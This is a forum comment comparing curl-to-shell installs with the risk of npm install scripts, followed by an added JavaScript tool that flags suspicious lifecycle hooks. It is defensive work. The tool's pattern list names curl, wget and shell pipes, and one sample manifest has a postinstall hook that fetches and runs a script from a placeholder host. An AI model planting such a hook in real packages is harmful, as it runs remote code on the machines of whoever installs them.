by treve
355 days ago
It wasn't meant as a gotcha. I'm actually curious if this went wrong, and if it was more of a spear-phishing style attack or a vulnerability hitting multiple people. Tons of devs download thousands of NPM packages as well, and each can execute code upon install, so a single curl-to-shell pipe from an HTTPS endpoint on a domain you checked always felt way safer than any `npm install`, and so it's pretty minor in comparison, and yet it gets a lot more attention than package managers, which _feels_ like security cargo culting. Plenty of supply chain attacks in package managers of course. But yeah, would like to be corrected if that intuition is wrong.
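The comment's point that every npm dependency "can execute code upon install" refers to lifecycle scripts (`preinstall`, `install`, `postinstall`, `prepare`) that npm runs automatically. The following is an added example, not code from the comment's author or from npm: a small audit that lists the install-time hooks declared in a set of `package.json` objects and flags commands a reviewer would want to read before allowing them to run. The package manifests and the review heuristics are constructed for this demonstration.

```javascript
// Added example: list install-time lifecycle scripts from package.json
// manifests and flag commands worth a manual read. Manifests and the
// heuristics below are constructed for the demo, not taken from any real package.

// Hooks that npm runs without being asked during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Patterns that do not prove anything malicious but justify a closer look
// (hypothetical heuristic list; extend for your own policy).
const REVIEW_PATTERNS = [
  { reason: "downloads remote content", re: /\b(curl|wget)\b/ },
  { reason: "pipes into a shell", re: /\|\s*(sh|bash|zsh)\b/ },
  { reason: "runs inline JavaScript", re: /\bnode\s+(-e|--eval)\b/ },
  { reason: "handles a base64 payload", re: /\bbase64\b/ },
];

// Return the install-time hooks a manifest declares, as {hook, command}.
function installHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS
    .filter((name) => typeof scripts[name] === "string" && scripts[name].trim() !== "")
    .map((name) => ({ hook: name, command: scripts[name] }));
}

// Reasons a single script command deserves review (empty array if none).
function reviewReasons(command) {
  return REVIEW_PATTERNS.filter((p) => p.re.test(command)).map((p) => p.reason);
}

// Audit one manifest: hooks with their reasons, plus an overall verdict.
function auditPackage(pkg) {
  const hooks = installHooks(pkg).map((h) => ({ ...h, reasons: reviewReasons(h.command) }));
  return {
    name: pkg.name || "(unnamed)",
    hooks,
    needsReview: hooks.some((h) => h.reasons.length > 0),
  };
}

function auditAll(pkgs) {
  return pkgs.map(auditPackage);
}

// Constructed sample manifests: one with no hooks, one with a common native
// build step, and one whose postinstall fetches and executes remote content.
const SAMPLE_PACKAGES = [
  { name: "plain-lib", version: "1.0.0", scripts: { test: "mocha" } },
  { name: "native-addon", version: "2.3.1", scripts: { install: "node-gyp rebuild" } },
  {
    name: "sketchy-dep",
    version: "0.0.1",
    scripts: { postinstall: "curl -s https://example.invalid/setup.sh | sh" },
  },
];

// Print a human-readable report when run directly: `node audit.js`.
if (typeof require !== "undefined" && require.main === module) {
  for (const result of auditAll(SAMPLE_PACKAGES)) {
    const tag = result.needsReview ? "REVIEW" : "ok";
    console.log(`[${tag}] ${result.name}`);
    for (const h of result.hooks) {
      console.log(`    ${h.hook}: ${h.command}${h.reasons.length ? "  <- " + h.reasons.join(", ") : ""}`);
    }
  }
}
```

In practice you would feed this the manifests from a downloaded tarball or from `node_modules` before the scripts have had a chance to run; installing with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) is what makes that ordering possible, at the cost of having to run legitimate build steps such as `node-gyp rebuild` yourself afterwards.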